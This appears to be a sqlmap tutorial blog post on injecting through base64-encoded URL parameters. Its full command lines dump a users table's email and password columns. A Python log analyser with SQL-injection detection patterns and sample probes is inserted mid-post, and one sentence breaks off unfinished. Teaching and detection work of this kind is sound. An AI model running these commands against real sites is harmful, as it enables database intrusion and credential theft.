sqlmap advanced tips and tricks

Today we’re going to look at using sqlmap when the target website uses base64 encoded parameters.

For example, we have something like:

http://<target>/products/article.php?art_id=<base64_encoded_value>

In this case we have to “convince” sqlmap to base64-encode every payload it sends. Fortunately, sqlmap has the following option, which lets you run your own Python code before each request:

--eval=EVALCODE        Evaluate provided Python code before the request

In Python 3, base64 encoding works on bytes, so to encode a string you need something like:

import base64
# b64encode takes bytes and returns bytes; decode() turns the result back into a str
print(base64.b64encode('MY_STRING'.encode()).decode())

Tip: it is also worth working out whether a prefix (something like ' or ") is needed in front of the payload; that is what --prefix is for in the commands below.

Once you get the database name,

In the end, the command will look something like this:

sqlmap -u "http://<target>/products/article.php?art_id=" -p art_id --eval "import base64; art_id = base64.b64encode(art_id.encode()).decode()" -v 3 --prefix="' "
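The flip side of this trick is that base64 is an encoding, not obfuscation: anyone reading the web server logs can decode the parameter just as easily as sqlmap encodes it. The script below is an added example (it is not part of this post and not sqlmap's code) that shows the defender's view: it parses access-log lines, base64-decodes each query parameter that looks like base64, and flags decoded values that carry several SQL-injection indicators at once (a string delimiter, a comment sequence, a SQL keyword). The log lines, the parameter name and the indicator list are constructed for the example; tune the indicators to your own application before relying on them.

```python
"""Spot SQL-injection attempts hidden inside base64-encoded query parameters.

Added example for this post, not sqlmap's own code. The access-log lines
below are constructed samples (Common Log Format), not real traffic.
"""
import base64
import binascii
import re
from urllib.parse import urlparse, unquote

# Constructed sample log: a normal request (art_id = "123"), two base64-wrapped
# injection probes, and a value that is not base64 at all.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /products/article.php?art_id=MTIz HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /products/article.php?art_id=MTIzJyBBTkQgMT0xLS0g HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /products/article.php?art_id=MTIzJyBVTklPTiBTRUxFQ1QgMSwyLDMtLSA= HTTP/1.1" 500 0
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /products/article.php?art_id=hello HTTP/1.1" 200 512
"""

# Minimal Common Log Format parser: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d+)'
)

# Only values made of the base64 alphabet with valid padding are worth decoding.
B64_RE = re.compile(r'^[A-Za-z0-9+/]+={0,2}$')

# Coarse indicators checked against the *decoded* value. Each one alone is
# noisy (an apostrophe in a name, "and" in a sentence); flagging needs two.
SQLI_INDICATORS = [
    ("quote", re.compile(r"['\"]")),
    ("comment", re.compile(r"--|#|/\*")),
    ("keyword", re.compile(r"\b(union|select|sleep|benchmark|or|and)\b", re.I)),
]


def try_b64decode(value):
    """Return the decoded text if value is base64 of printable UTF-8, else None."""
    if not B64_RE.match(value) or len(value) % 4:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    return text if text.isprintable() else None


def sqli_indicators(decoded):
    """Names of the indicator classes present in a decoded parameter value."""
    return [name for name, pat in SQLI_INDICATORS if pat.search(decoded)]


def analyse_log(text):
    """Return findings for requests whose base64 parameters look like SQLi."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlparse(m.group("path")).query
        for pair in query.split("&"):
            name, _, value = pair.partition("=")  # keeps base64 '=' padding intact
            decoded = try_b64decode(unquote(value))  # unquote, not unquote_plus: '+' is base64
            if decoded is None:
                continue
            hits = sqli_indicators(decoded)
            if len(hits) >= 2:
                findings.append({"ip": m.group("ip"), "param": name,
                                 "decoded": decoded, "hits": hits})
    return findings


if __name__ == "__main__":
    for f in analyse_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['param']}={f['decoded']!r} indicators={f['hits']}")
```

Run it as-is to see the two probes surfaced with their decoded payloads; pointing `analyse_log` at a real access log is a one-line change. The two-indicator rule is deliberate: a single quote or the word "and" inside a legitimately base64-encoded value is common, whereas a quote plus a comment sequence or a SQL keyword in the same value rarely is.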

Once you have a list of tables and, let’s say, you only want to retrieve the columns from the my_users table, you can add the -D and -T parameters:

sqlmap -u "http://<target>/products/article.php?art_id=" -p art_id --eval "import base64; art_id = base64.b64encode(art_id.encode()).decode()" -v 3 --prefix="' " -D my_db -T my_users

If you only want to focus on specific fields, you can use the -C option:

sqlmap -u "http://<target>/products/article.php?art_id=" -p art_id --eval "import base64; art_id = base64.b64encode(art_id.encode()).decode()" -v 3 --prefix="' " -D my_db -T my_users -C my_email,my_password

Hope this helps!